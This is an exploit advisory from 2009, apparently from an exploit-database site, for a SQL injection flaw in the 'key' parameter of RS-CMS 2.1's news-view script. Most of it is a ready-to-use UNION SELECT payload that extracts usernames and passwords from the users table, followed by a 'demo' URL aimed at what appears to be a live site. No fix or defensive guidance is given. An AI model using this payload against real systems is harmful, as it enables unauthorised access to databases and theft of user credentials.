RS-CMS 2.1 (key) Remote SQL Injection Vulnerability

2009-06-22 21:34:28

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability

[+] Found by : Mr.tro0oqy

[+] C0ntact : [email protected] <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
BUGS
====

Sql Injections:
rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--

DEMO
====
http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--


=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
all my Friends

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.